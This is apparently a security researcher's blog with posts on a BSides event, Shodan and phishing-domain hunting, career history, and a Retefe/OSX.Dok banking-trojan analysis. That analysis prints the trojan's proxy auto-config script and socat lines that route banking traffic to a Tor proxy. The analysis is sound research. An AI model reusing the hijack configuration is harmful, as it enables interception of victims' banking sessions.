BSides Liverpool

It was 3 years ago or so that I had the itch to put together a BSides event in my home town. I'd worked in this industry for about 20 years and had built a really good set of relationships across a large number of companies.

I wanted to give something back, and that was an event in the middle of my city. I arranged a call with the incredible Jack Daniel and he spoke to me for about an hour from his porch, swatting away various insects in the summer heat. He carefully explained to me, someone with no event organising experience, how to bring together sponsors, attendees, speakers and everything else in between.

Then, BSides Liverpool was born.


In late 2016, I arranged with my then team mates at Fujitsu how I would plan the event. We'd have various tracks on security, including a rookie track. I've found I get an incredible amount of enjoyment out of mentoring, so I was excited at this prospect.

Now, it was originally planned for the summer of 2017, then 2018. You get the picture. Late in 2018 I bit the bullet and registered a Twitter account with the name bsideslivrpool, as the original 'bsidesliverpool' was already taken.

This was a huge step for me, being famous for procrastinating over select details. Having already reached out to a few people, I received a DM a few weeks later asking who was behind the account (it was Jenny Radcliffe!). I couldn't think of anyone better than Jenny. I'd known Jen for a few years, having been bewitched by her incredible social skills; someone who can put a complete stranger at ease and get anyone onside in moments has an amazing skill, and it's no wonder she is called the People Hacker. I had assembled an amazing team already.

Jen and I quickly realised that people like ourselves, for all our Scouse determination, were likely not going to be able to orchestrate an event at this scale! However, we both knew someone who could! Step forward Mr Stuart Coulson. Stu, my friend and my mentor, is someone I've grown to respect every single day, with a level of integrity unmatched in this industry; he was at the very first public talk I ever gave, in Blackpool, and gave me some incredible feedback.

The team was complete!

We both agreed he would be a perfect fit on the team, befitting an inaugural event, as someone who did this sort of planning for a living. I was proud to welcome Stuart on board as a co-founder and organiser.

One final person to join the organising committee was the wizard Antisocial Engineer, who can do things with a keyboard that I wish I could!

The event gathered some incredible sponsors; we hit our goal very quickly! Thanks to the team's efforts we got the swag, the venue, the speakers, the attendee tickets and the helper squad sorted.

The above two sentences don't do justice to the large number of Skype calls, telephone calls, Slack messages and WhatsApp conversations we got through over 6 months of consistent badgering for sponsors, the CFP and other stuff. I can't do it justice here; it's just not possible.

The event arrived on June 29th, which was comically the hottest day of the year; we put the event on in the Maritime Museum, made solely from bricks and mortar, with what felt like zero air con. I had badgered/asked some incredible researchers to come and speak at the event, and they delivered. Thank you all.

The event went without issue, or so I thought.

There was a tweet, there is always a Tweet.

A now deleted tweet pointed out the panel was made up of 4 white males, one being my friend Stuart Coulson. Two others were long-standing members of the security community who had been drafted in at literally days' notice to fill in for a panel which had been beset with tragedy. The final member was a relative rookie, talking about what his journey into information security had been like (18 months, IIRC).

You can read the "apology" from the account here. I won't belabour the response already given by our team, which you can read here.

Infosec Drama’o’clock

Our team put an untold number of hours into developing this conference, and when there is negative or unconstructive feedback, I personally take it extremely personally. I come from a very poor background, and I am disabled, and understand somewhat how difficult and painful this industry can be as a minority; to have someone pass judgment on a single photo, which in the cold light of day was an all white male panel, shows the event in a poor light. The 'drama' that gets passed around is the result of a systemic problem Twitter has: everyone has an echo chamber, and you usually end up arguing with everybody without a response to the original problem. This was a perfect example of that.

We received incredible support both in the Twitter thread and verbally; I would like to thank you ALL for your support for the event.

I took this personally, as I often do; I felt responsible. As someone who thinks of themselves as having the ability to manage the expectations of many whilst balancing nuanced, realistic expectations, I saw Twitter in the most disgusting way I'd ever seen it. I saw abuse directed at my teammates, I saw a racial slur used to describe the panel. I hated it all, I absolutely hated it, all because of a photograph.

I've spoken to the team, and I will no longer be an 'organiser' of BSides Liverpool. I will be around to support my friends 100%, but the team needs someone who is mentally stronger than me, who isn't as emotionally attached to things as I am.

There is nothing wrong with being passionate about something, but when that passion becomes pain, it's time to take a look outside. This may all seem a bit dramatic, and it probably is; I just felt the need to respond in my own way.

Thank you to Jen, Stu, Rich, Jack, Lee.

Threat Hunting for Free¹

There is no network perimeter anymore!

Well, there is.

¹ Free in cost only; measured in time and effort.

Whether we like it or not, perimeters exist, and defending them is hard; visibility is even harder. Risk management, a risk register, a vulnerability acceptance posture: yeah, you usually hear about these after a security incident. There are some things you can do to fortify your defences that don't require a business case to implement, don't need a project manager, and likely cost less than a coffee.

Adversaries, attackers, breaches, hackers: all familiar words in today's landscape, but it's not as bad as it would appear. You can do a lot for not a lot of your time and effort, and in this blog I will show two services that you can automate to remove a level of uncertainty from your blind spots.


Firstly, there are 100 quality blog posts on defending your network using Shodan, and I will not try to do better than them; using my own experience and methods, I'll share some ways to gain insight into how attackers use Shodan to find an entry point or a vulnerability.

So firstly, you'll need to get a Shodan account; they are super cheap, and usually around Black Friday they do a lifetime account. Once you've got started, familiarise yourself with the CLI and install the tools required using:

pip install shodan

shodan init API_KEY_HERE

Once you're done installing, hit the --help switch to get a list of commands and, critically, read the banner specification.

So, in our case we need to identify a subnet to monitor. John has perfectly described how to do this here, but this post goes a little deeper.


So, unless you're fortunate enough to never have heard of SMB or ransomware, you are likely going to be very bored by this set of investigative steps.
We're going to use a well known range of addresses to identify SMB exposure, and then run to someone internally and have a long chat about ransomware insurance or Microsoft upgrade paths, whichever is cheapest (YMMV).

So, we have our range of addresses from Azure. We're going to use this list from here.

We are going to use a range from the Microsoft Azure datacenter list, so given this is a public address range, let's go.

First we go with:

shodan count net:
1375

This will output the total number of devices Shodan can see in the range, which is not very helpful on its own, so let's chop it up a little more.

Cool, so let's say I was an attacker; I'd be interested in the path of least resistance, right? SMB, RDP, etc. Fire up Metasploit and watch as it exploits it all for me.

So let's check whether 445 or 3389 are open in this range. We need to extend the results list a little to be able to see them (AFAIK Shodan defaults to 300 results).

shodan stats --facets port:500 net:

will return a list of the top 500 ports, and guess what...



Of course the ports being open doesn't immediately mean pwnage, and nor should it. Multifactor authentication is available for Azure (not free, though for admins it is), 445 needs to actually be vulnerable, and of course you can use other things like Authy; for O365 there is guidance here. You can check for the known vulnerability using the following command:

shodan count port:445 net: SMB vuln:MS17-010

In my tests, the result was ZERO, so that's good news. That is a very small step in protecting the perimeter for less than the price of a coffee, and in about the same time as it would take to drink it.
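As an added example (not code from the original post), the same three checks, total hosts in a prefix, top ports with a focus on 445 and 3389, and the MS17-010 count, wrapped around the official shodan Python library so they can run on a schedule against your own prefixes. The prefix 203.0.113.0/24, the SHODAN_API_KEY environment variable and the sample response are assumptions made for the example; the response shape follows Shodan's count endpoint (a total plus a port facet list), so the parsing and verdict logic can be exercised offline without a key.

```python
"""
Added example, not code from the original post: the post's three Shodan checks (total hosts in a
prefix, top ports, hosts Shodan tags as MS17-010 vulnerable) wrapped so they can run on a schedule
over a list of your own prefixes. The live Shodan calls are isolated in run_checks(); the query
construction and result handling are exercised offline against a constructed API response.
The prefix 203.0.113.0/24 is documentation address space used as a placeholder, not a real range.
"""
import os
from typing import Dict, List, Tuple

WATCH_PORTS = (445, 3389)   # SMB and RDP, the "path of least resistance" ports from the post


def build_queries(net: str) -> Dict[str, str]:
    """Shodan search strings for one prefix, mirroring the CLI commands in the post."""
    return {
        "total": f"net:{net}",
        "ports": f"net:{net}",                         # same query, requested with a port facet
        "ms17_010": f"net:{net} port:445 vuln:MS17-010",
    }


def summarise_ports(count_response: dict, watch_ports=WATCH_PORTS) -> Dict[int, int]:
    """
    Pull the counts for the ports we care about out of a /shodan/host/count response.
    The facet list has the shape {"facets": {"port": [{"value": 445, "count": 12}, ...]}}.
    Ports that never appear in the facet are reported as 0 rather than omitted.
    """
    facet = count_response.get("facets", {}).get("port", [])
    seen = {int(item["value"]): int(item["count"]) for item in facet}
    return {port: seen.get(port, 0) for port in watch_ports}


def assess(total: int, port_counts: Dict[int, int], vulnerable: int) -> Tuple[str, List[str]]:
    """Turn the raw numbers into a verdict and human-readable findings for the ticket or chat."""
    findings = []
    for port, n in sorted(port_counts.items()):
        if n:
            findings.append(f"{n} of {total} hosts expose port {port}")
    if vulnerable:
        findings.append(f"{vulnerable} hosts tagged MS17-010 on 445: patch/isolate first")
        return "critical", findings
    if findings:
        return "review", findings
    return "ok", [f"{total} hosts visible, none on {', '.join(map(str, WATCH_PORTS))}"]


def run_checks(net: str, api_key: str = None) -> Tuple[str, List[str]]:
    """Live version: needs `pip install shodan` and a key (SHODAN_API_KEY env var or argument)."""
    import shodan  # imported here so the offline helpers above work without the package
    api = shodan.Shodan(api_key or os.environ["SHODAN_API_KEY"])
    q = build_queries(net)
    total = api.count(q["total"])["total"]
    ports = summarise_ports(api.count(q["ports"], facets=[("port", 500)]))
    vulnerable = api.count(q["ms17_010"])["total"]
    return assess(total, ports, vulnerable)


# Constructed sample response in the shape Shodan's count endpoint returns, for offline use.
SAMPLE_COUNT_RESPONSE = {
    "total": 1375,
    "facets": {"port": [{"value": 443, "count": 900}, {"value": 80, "count": 410},
                        {"value": 3389, "count": 17}, {"value": 22, "count": 9}]},
}

if __name__ == "__main__":
    counts = summarise_ports(SAMPLE_COUNT_RESPONSE)
    print(assess(SAMPLE_COUNT_RESPONSE["total"], counts, vulnerable=0))
```

Running run_checks("203.0.113.0/24") with a key performs the three lookups; the "review" verdict is the cue for the chat about RDP exposure, and "critical" means a host in your range carries Shodan's MS17-010 tag and goes to the top of the patch list.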

Here Phishy, phishy...

Next is the excellent tool from @x0rz, here.

I've been using my own version of this tool, customised to use some more personally interesting topics such as banking and US political lures. You can do the same for your own company, as I've done in the past with varying success; in our case we're using Microsoft. So we can just comment out all of the junk and put in the following (I recommend combining it with dnstwist); then we have a long list of likely typo domains, and some which are being used in the certificate transparency generation list. This gives us a lot, so if we use these in conjunction with our list we may get lucky. This can help us lower the risk of users being phished, or of landing pages being used to harvest credentials, as observed recently by Microsoft here.

Some results here
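As an added example, not the original post's code and not code from phishing_catcher or dnstwist, the following sketches the workflow described above: generate dnstwist-style look-alike candidates for a brand you defend, then score domain names as they come out of a certificate transparency feed against those candidates and a keyword list, in the spirit of phishing_catcher's scoring. The brand "contosobank", the keyword weights, the TLD list and the CT entries are all constructed for the example.

```python
"""
Added example (not from the original post, phishing_catcher or dnstwist): an offline version of
the workflow the post describes. generate_typos() produces dnstwist-style look-alike candidates
for a domain label you defend; score_ct_domain() rates a name seen in a certificate transparency
feed against those candidates and a keyword list, in the spirit of phishing_catcher's scoring.
The brand "contosobank", the weights, the TLD list and the CT entries are constructed.
"""
from typing import Dict, List, Set

# Keywords a defender of this (constructed) brand might care about, with weights.
KEYWORDS = {"contosobank": 50, "login": 20, "secure": 15, "account": 15, "verify": 15}
SUSPICIOUS_TLDS = {"tk", "ml", "ga", "cf", "gq", "xyz", "top"}
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "b": "d"}


def generate_typos(label: str) -> Set[str]:
    """dnstwist-style permutations of one DNS label: omission, repetition, transposition, homoglyph."""
    out = set()
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:])                  # omission:      contosbank
        out.add(label[:i] + label[i] + label[i:])           # repetition:    contossobank
        if i < len(label) - 1:                              # transposition: ocntosobank
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
        if label[i] in HOMOGLYPHS:                          # homoglyph:     c0ntosobank
            out.add(label[:i] + HOMOGLYPHS[label[i]] + label[i + 1:])
    out.discard(label)
    return out


def score_ct_domain(domain: str, typos: Set[str]) -> Dict[str, object]:
    """Score one CT-log domain. Higher means more worth a look; reasons explain the score."""
    d = domain.lower().lstrip("*.")
    labels = d.split(".")
    parts = [p for lbl in labels for p in lbl.split("-")]   # "contosbank-login" -> both halves
    score, reasons = 0, []
    for word, weight in KEYWORDS.items():
        if word in d:
            score += weight
            reasons.append(f"keyword:{word}")
    if any(p in typos for p in parts):
        score += 70
        reasons.append("typo-of-brand")
    if labels[-1] in SUSPICIOUS_TLDS:
        score += 20
        reasons.append("suspicious-tld")
    if d.count("-") >= 2:
        score += 10
        reasons.append("many-hyphens")
    if d.count(".") >= 3:
        score += 10
        reasons.append("deep-subdomain")
    return {"domain": domain, "score": score, "reasons": reasons}


def hunt(ct_domains: List[str], brand: str, threshold: int = 60) -> List[Dict[str, object]]:
    """Return scored entries at or above the threshold, highest first."""
    typos = generate_typos(brand)
    hits = [score_ct_domain(d, typos) for d in ct_domains]
    return sorted((h for h in hits if h["score"] >= threshold), key=lambda h: -h["score"])


# Constructed sample of domain names as they might appear in a CT log feed.
SAMPLE_CT_DOMAINS = [
    "contosbank-login.tk",          # omission typo + keyword + suspicious TLD
    "secure.c0ntosobank.com",       # homoglyph typo + keyword
    "mail.example.org",             # benign
    "account-verify-secure.xyz",    # keyword stuffing, no brand
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_CT_DOMAINS, "contosobank"):
        print(hit["score"], hit["domain"], ",".join(hit["reasons"]))
```

The threshold is the knob that decides how much of the feed lands in front of an analyst; the reasons list is what makes a hit triageable rather than just a number.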

Happy Hunting


Journey into Security - Part 2

I was fortunate enough to work with some incredibly talented people in my journey into security, who helped me understand difficult concepts, some of which I am still learning.

  • Cryptography
  • Windows Internals

Two skills I believe are absolutely key to working in security, because no matter where you go inside security you'll need an intimate understanding of both, so that's where I decided to start. I was working on user virtualisation software; this is, in essence, a reflection of roaming profiles, using some magic to ensure a consistent user experience across all platforms, including physical and virtual desktops, and not limited to things like published desktops from Citrix, VMware & Microsoft.

I furthered my understanding by buying a couple of books.



Learn that sh*t

I probably refer to at least one of these books once a week for a function or the parameter of a service, partially because I have a terrible memory. In that role, I was automating some of the work I was doing and came across tools like PsExec, Sysmon and the rest of the toolkit. So, like any analyst, I automated some of my testing and began to explore the rest of the tools.

Process Monitor & Explorer - thank you, Mark and Bruce!

I used these to troubleshoot registry problems, identify login issues and generally understand what was happening during login: a low-level way of examining & testing bugs that I was trying to troubleshoot non-programmatically.

Little did I know that during the troubleshooting I would identify a malware infection in my own lab; I was able to track this down using some of the inbuilt filters, which captured the process running when I visited a certain site. This was the moment I knew I was interested in malware. I didn't have any idea what it was capable of, but I knew how to identify it and how to remove it.

Moving on

I was 'content' in the role I just mentioned and had a passing interest in security, but became more and more fascinated by some of the articles being published online. I attempted a few CTFs and failed miserably; I didn't know what I was doing, and although I was curious, I took defeat very badly, and personally. I was persistent: I started visiting some forums and asking questions, I joined and started reading the content, copying and learning. I also learnt of Lenny Zeltser as part of my research and found this, which was at version 5 I think when I discovered it, and it included cheat sheets on taking apart malware! I was saved; I had step-by-step guides on using the tools I had watched, and I learned a lot (thank you, Lenny!).

I had a keen interest in attending FOR610 and joked 'I would give my first born to go', the reason being that it was super expensive. I learnt an awful lot on this course and still refer to the course materials to this day; both Lenny and his colleagues are incredibly helpful, approachable and clearly enjoy what they do.

I've spent a few years at Fujitsu now and learnt more than I can possibly write down here, but some of the highlights included working alongside great people, being fortunate enough to work at the NCSC as part of what was then the Fusion Cell and is now known as Industry 100, representing Fujitsu on a number of occasions all over the world, and attending Black Hat & DEF CON. Speaking at conferences on behalf of my employer is something I am incredibly proud to do, and something which impresses my daughter even more, which is all that matters.

Giving back

I have the opportunity to share what I know and have learnt. This kind of opportunity gives me an incredible feeling of gratitude, knowing I am assisting those who need to learn, like me. I forever refer to myself as a 'noob', because when you realise you know everything, you realise you know nothing. The opportunity in question is working alongside some talented people at CTU in Prague on a project called CivilSphere, working remotely to protect those vulnerable to being targeted. I have always been impressed by the work done by the likes of Citizen Lab and was inspired to try and be part of this protection network. I am very thankful to Sebas for this opportunity, and to all the talented people at CivilSphere.

Next Steps

I will be leaving Fujitsu in a few weeks, to start a new role at Proofpoint. I look forward to learning more interesting concepts, and being a noob all over again.



Journey into Security - Part 1

I consider myself a noob, forever asking simple questions. Just how does DNS work? WTF is a floating pointer? A lot of these questions are borne out of curiosity, and a few people said they would be interested in hearing how I got into security. So I decided to write it down. It feels very much 'LOOK AT ME, HOW COOL I AM' and self-indulgent writing this, but that couldn't be further from the truth; I hate talking or writing about myself, but in light of the current state of security, being considered a mentor to a few people and working with extremely bright people, I felt obliged.

I have loved computers ever since I can remember; I won't bore you to tears with my first computer because it's likely the same as most people's my age, but here is a photo of it.


2 MHz CPU

A shared computer at home, no games.

Fast forward a very long time to my teenage years, and I was asked to help out at a family friend's place of work. They did high-speed scanning of documents (invoices, purchase orders, etc.); I automated parts of this job and put a few people out of work (sorry). With this came the management of the storage of the scanned items, which came with the need to identify secure methods of storage. At this point, an online presence was just emerging in terms of retail, so it wasn't really a consideration that at some point payments would need to be taken online, managed in an office and stored internally. So my curiosity led me to a device known as a domain controller (Windows 2003 SBS), which contained the following:

  1. DHCP
  2. DNS
  3. WINS

WTF was this, and what did they all mean? Well, I needed to understand what I was working with, so I quickly spent a lot of time on a place called TechNet. Before Microsoft released the useless bots to answer questions, it was a thriving community with a lot of answers and help. I learned the basics of network management here: understanding what a subnet was, and why it was important to track who was using what range, and why (think credit card processing).

Now, I realised at the time that a lot of letters had started to appear in the signatures of my peers (MCSE, CompTIA). I thought, what is this? A quick Yahoo! (yes, Yahoo) search showed me that Microsoft was giving certifications to people who took tests, and with that came the letters! Cool, I thought; I was in my 20s and had not sat a test since school, and I did not go to university, so it was natural to try and test myself. That particular employer did not give me any training, so I had to leave and ended up at one job (I have missed out two roles here that do not have any impact on my journey into security): I ended up at a communications company, dealing with MPLS, leased lines, dedicated fibre links etc. Basically, the stuff that powers the internet & telephony.

My first job in this role was to 'map the network'. Wait, what? I didn't have the slightest idea where to begin. Routers? Switches? I was a Microsoft specialist and had stayed away from networking because there were dedicated resources for it. I had the opportunity to understand these things and did so quickly; I had a vague idea of the topology and was able to Visio a map in about 14 days. This was as much a test for me as it was for the company. We had:

  1. WAN Router(s) exposed by default auth
  2. Hardcoded credentials in reception for wifi
  3. Gold Images that had no updates applied for over 10 months

So at this point, I had access to an Active Directory with approx 3,00 users and mobile devices, and computers which ran XP with a Windows 7 deployment upcoming. This was my job to manage, design and deploy. I was very scared; computers were something I used, not something I knew how to make use of!

I was extremely fortunate to attend a Microsoft course titled 'Fast track to managing and maintaining an Active Directory domain 2003'. This course, 5 days away from my home in a strange city, taught me so much; I had 10 hrs a day exposed to an Active Directory domain that I built and could break and rebuild without the fear of a P45 arriving. I got further into some concepts that I had come across (DHCP, DNS, WINS) and some other more interesting concepts which ignited my interest further.


I had long been in awe of security specialists. I had only minor interaction with these superheroes; they usually worked in a firewall team, or some other amazing-sounding team, and would only appear when things were bad. So that was my interest: what DID these people do? Well, I quickly discovered that a set of ACLs on a firewall was not as interesting to me as managing a forest of objects for thousands of people, and understood that securing Active Directory was much more interesting. I started to dig into Active Directory and, trying to understand further, I quickly learned a few things:

  1. Active Directory is hard
  2. Active Directory is hard
  3. Active Directory is hard

Now the grizzled amongst you will say it's not; I completely disagree. The entire concept of Active Directory has been badly managed, and whilst it's now an entire attack surface and has brought to light some of the most incredible attack methods, there is very little in the blue team area on protecting Microsoft Active Directories.

So, after dedicating a few years to becoming a specialist* in Active Directory security, I moved on, to a role in the legal marketplace. I was protecting the assets of solicitors, a domain unlike any other I've ever worked in before. A difficult but challenging role, because the reliance on physical documentation for legal professionals restricts much of what is digitised.

Exams, Exams.


I was very boring for a few years, taking exams every few months.


One day, I arrived for work and was told I would be sent on an 'intervention'. In the UK this refers to the concept that when a legal practice is in distress, a member of the 'SRA' will intervene and take over; this included all electronic items. I was basically an IT bailiff.

I had managed antivirus solutions because nobody else would (who can blame them?), but quickly realised what a GOLDMINE of information was being identified. It was a pretty default policy (block, allow, delete, quarantine); the little friction it was generating was not worth the cost of renewals, so I changed it and applied it to different machines, using different policies depending on location and level of practice seniority. I didn't want to get the sack because a partner of the practice couldn't plug in the USB device he also used at home.

I was identified as a potential for the intervention 'because Bryan knows security'. Did I? Not really, but I did know how dangerous Office macros were and why IE6 really shouldn't be used. Let's go. Anyway, an 'encrypted database' was being used to store all client data and we needed it to be able to 'take on the cases'. The 'encrypted database' was a Microsoft Access database; it was trivial to crack, made even easier by the fact the password was stored in passwords.txt in the same directory.

Anyway, I was hailed as a saviour, and even though no laws were broken, that resulted in a lot of money being earned, and my value rising too (all because of a password policy?).

So I was given access to deploy my OWN antivirus policies as a result of some good work around 'finding passwords in directories called passwords'; I had shown interest, so there we go.

I deployed extremely restrictive policies to execs, so much so that they complained. I updated device controls to prevent data loss via mobile phones and USB sticks, identified malware as a result of this, and thought 'well, this is cool; I'm using something people hate to hear about to find all this bad stuff, who wouldn't be interested in this?!' Turns out it was only me, and this is where my security passion was really born.

Hello, Pentester 

Fast forward a few months and I received an alert from my very restrictive policy, alerting me to someone running passwordump.exe on my domain controller. Not only did I lay a very small egg in my pants, but I was worried, because the domain controller was a honeypot. I had deployed a few domain controllers in the sense that they advertised the services to a would-be attacker but contained no actual resources. A modern-day RODC, before RODC was a thing. Turns out we had a 'black box' pen test which the manager was aware of; I quickly identified the pen tester in a room he had 'walked into' and plugged into a telephone port, identified the DHCP range as being broadcast from my 'domain controller', and that's all: I had just named the server DOMAIN CONTROLLER, and that alone, with no ntds.dit, was enough to attract the attention of his toolkit. The server was only running DHCP.

Anyway, I tried to take control of his session, and this image made it into the eventual pen test report as positive feedback on deception.


LOL no

What does this button do?

I moved on from that role; as my passion for security grew I moved to a company that was responsible for user virtualisation. I learned more here about user profiles than I can ever forget: the stages of authentication involved in a login, the handshake and, crucially, the concepts around Kerberos and NTLM. I had a core understanding of authentication and its reliance on trust, and with this came a more curious-minded approach. I worked with extremely talented developers and students who were driven by curiosity in an academic sense; I was purely trying to learn and stop being a noob. I was in a QA team, a bug hunter! Sadly, the only bugs that drew attention were not 'this button works' bugs, but the storing-plain-text-passwords-in-SQLite-databases kind of bugs. Along with this came the realisation that I should be documenting every single thing I ever needed to know in a physical form, so I bought Moleskines.

Lots of them.



Write that sh*t down

As I've written this I have realised a second part will be much more interesting than one long boring post. It will include more of the recent stuff: a failed CISSP study attempt, how I identified bugs before bug bounties were cool, & some malware stuff.

Panel party - Loki, Pony.

Hunting via Hybrid Analysis, I identified persistent offender(s) storing content on a panel. I kept my eye on it for a while, and when it was busy enough, I managed to get the entire server configuration of the panels.

Wallet stealer
  1. Loki admin
  2. Pony admin

Usernames, passwords for MySQL and database configurations, over 100 lists of target applications, BTC wallets, FTP clients, browsers, games

The most interesting thing for me was that Loki has a POS module.

Here are the contents; ping me if it becomes unavailable.

  • SHASUM: 591cc7fe34d5cd76c7bd8be4ee9d94741e293946

Have fun.

Russia v Ukraine : A primer for the uninitiated

Russian intervention in Ukraine, be it military or 'cyber', has historically been something of a strategic playground. Whilst other attacks observed are more 'noisy', or disruptive, there are ongoing incidents which can be, and will be, attributed to Russia. If, like me, you're a student of the aspects of cyber incidents, particularly when it comes to Russia v Ukraine, you'll know experts will quickly identify and theorise that they are the work of the shadowy Russian bear(s).

My own learning has focused on 'why', and I've digested and recommend the following:

  1. The 'ultimate' guide, in my humble opinion, is here: Russia v Ukraine, Kenneth Geers.
  2. APT28, or, depending on the vendor:
     Pawn Storm,
     Sofacy Group,
     Tsar Team,
     Threat Group-4127,
     Grizzly Steppe (when combined with Cozy Bear).
     The important part to note here is that APT28 is widely believed to be GRU, and GRU is explained in detail here.
  3. APT29 or Cozy Bear, again depending on the vendor, may be called any of the following:
     Office Monkeys,
     The Dukes,
     Grizzly Steppe (when combined with Fancy Bear).

This is the best infographic I have seen explaining the process of APT28/29 activity.



There are a breathless number of analysts capable of dissecting the incidents that occur within Ukraine's borders, and more often than not the output is bullet quotes seeking to encourage fear, uncertainty and doubt, AKA FUD. In my experience of working with some extremely talented analysts, both in government and at F500 companies, they actively avoid headline-grabbing and offer comments by way of research and analysis. Robert M. Lee explicitly called out this type of behaviour and asked people to 'stick to the facts'.

The concept of 'hackers' knocking out power in a country is one which evokes a large number of reactions. I look to people like Robert M. Lee for measured and sensible analysis, as should you; if your number one source for information is mainstream media, you won't get insights, you'll get clickbait.

With that in mind, the elephant in the room is the 2016 US election, something which those not directly involved in intelligence, be it cyber or policy, will still be closely unpicking. I recommend the following content for insights into how 'fake news' (and I still can't say that phrase with a straight face) helped undermine the political agenda.

Some of these are incredibly long-winded and contain quite a lot of personal sentiment, but if you can decipher that and understand the underlying theme, that disinformation played a significant part in the U.S. election, you'll understand what a weapon social media has become and why, as a 'Cyber Threat' analyst, you'll be required to pay extremely close attention to it.

Cambridge Analytica

tl;dr: big data manipulated everyone.

The Plot to Hack America by Malcom Nance

tl;dr: coincidence takes a lot of hard work. Also, Russia sought to manipulate the election by way of a number of methods, including social media propaganda, hacking of DNC emails and strategically placed adverts.

Is Ukraine the Test Lab for Russian - Wired

tl;dr: attackers gained access to critical systems; excellent analysis from Dragos here.


Retefe v OSX.DOK Part 2

Last month I had some time to look at the latest iteration of OSX.DOK/Retefe for macOS, and thanks to Jaromir from Avast and the excellent VB presentation I can conclude they are almost identical; the reasons for this include the following.

From the presentation at VB, Avast noted:

The below is a collection of some of the recent samples collected from Swiss campaigns targeting OSX victims.

The payloads are being signed with developer certificates, presumably stolen, which enable them to bypass the macOS security feature known as Gatekeeper. It's not clear how these accounts are being used, or if the actors are using pseudonyms to avoid suspicion; below are some samples. You can use the codesign command with the relevant parameters to identify the signed status of the app bundle.

Masquerading as


All macOS apps need a manifest file known as Info.plist, which includes MachineOSBuild as a tag; in this case it was 13F1911, which is commonly known as OS X Mavericks, meaning it was likely built in a virtual machine or the developer has an older OS.

The samples are UPX packed 


I've uploaded just one sample for researchers to analyse; however, Apple is actively investigating the misuse of these certificates.

  • 11/05 notify Apple Security
  • 13/05 confirmed incident with Apple Security
  • 17/05 shared developer identities with Apple

Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods to those I had seen used by Retefe. Having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks, the United Kingdom and France, but the real targets in my own experience have been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot from Checkpoint here, so slightly confusing.

The part of Retefe which struck me as similar was the proxy .js (PAC) file the trojan uses to identify the range of banking sites it wants to intercept:

// Retefe proxy auto-config (PAC) script as recovered; the host patterns were lost in extraction
// and are left as they appear. Any host matching a pattern is routed via the Tor proxy.
function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*', '', '*',
        '*', '', '*', '*',
        '*', '*', '*', '*', '*',
        '*', '*', '*', '*',
        '', '*', '*', '', '*',
        '', '*', '', '*', '*', '*',
        '*', '*', '*', '*', '*',
        '*', '', '*', '*',
        '*', '*', '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy;
        }
    }
    return "DIRECT";
}

and from the OSX version, which includes the following LaunchAgents:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe                    OSX/Dok
Root Certificate          Root Certificate
Proxy hijacking           Proxy hijacking
paoyu7gub72lykuk.onion    paoyu7gub72lykuk.onion
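One way to audit a PAC file like the one above offline, as an added example that is not from the original post: it compiles the FindProxyForURL function with a local shExpMatch, runs a set of hostnames through it and reports which are diverted and whether the proxy is a Tor hidden service. The PAC text, host patterns and hostnames here are constructed; only the .onion address is the one quoted in the post.

```javascript
// Added example: audit a Retefe/OSX.Dok-style PAC file offline. The PAC text
// below is constructed to mirror the structure in the post; the host patterns
// are placeholders, only the .onion address is the one quoted in the post.
const PAC_SOURCE = `
function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.examplebank.test',
        'onlinebanking.example-credit.test');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy;
        }
    }
    return "DIRECT";
}`;

// Local stand-in for the browser's shExpMatch(): shell-style glob matching
// where '*' matches any run of characters and '?' matches one character.
function shExpMatch(str, shexp) {
  const escape = s => s.replace(/[.+^${}()|[\]\\]/g, '\\$&');
  const pattern = shexp.split('*')
    .map(part => part.split('?').map(escape).join('.'))
    .join('.*');
  return new RegExp('^' + pattern + '$', 'i').test(str);
}

// Compile the PAC body in a scope that exposes only shExpMatch, and return
// its FindProxyForURL so it can be called the way a proxy client would.
function loadPac(source) {
  const factory = new Function('shExpMatch', source + '\nreturn FindProxyForURL;');
  return factory(shExpMatch);
}

// Run candidate hostnames through the PAC and report every one that is not
// sent DIRECT, noting whether the configured proxy is a Tor hidden service.
function auditPac(source, candidates) {
  const findProxy = loadPac(source);
  const diverted = [];
  for (const host of candidates) {
    const decision = findProxy('https://' + host + '/', host);
    if (decision === 'DIRECT') continue;
    const target = decision.replace(/^PROXY\s+/i, '').replace(/;.*$/, '');
    diverted.push({ host, target, viaOnion: /\.onion(:\d+)?$/i.test(target) });
  }
  return diverted;
}

// Constructed hostnames: two that the PAC intercepts, two that it leaves alone.
const SAMPLE_HOSTS = [
  'login.examplebank.test',            // matches '*.examplebank.test'
  'onlinebanking.example-credit.test', // exact pattern match
  'examplebank.test',                  // no leading label, so not matched
  'www.example.com',                   // unrelated site
];

for (const hit of auditPac(PAC_SOURCE, SAMPLE_HOSTS)) {
  console.log(`${hit.host} -> ${hit.target}${hit.viaOnion ? ' (Tor hidden service)' : ''}`);
}
```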

Banking trojans have been at the forefront of the media for a while, and the revenue they generate is clearly attractive to criminals and, as demonstrated recently both here and here, to law enforcement.


#MongoDB - A dumpster fire of cry laughter

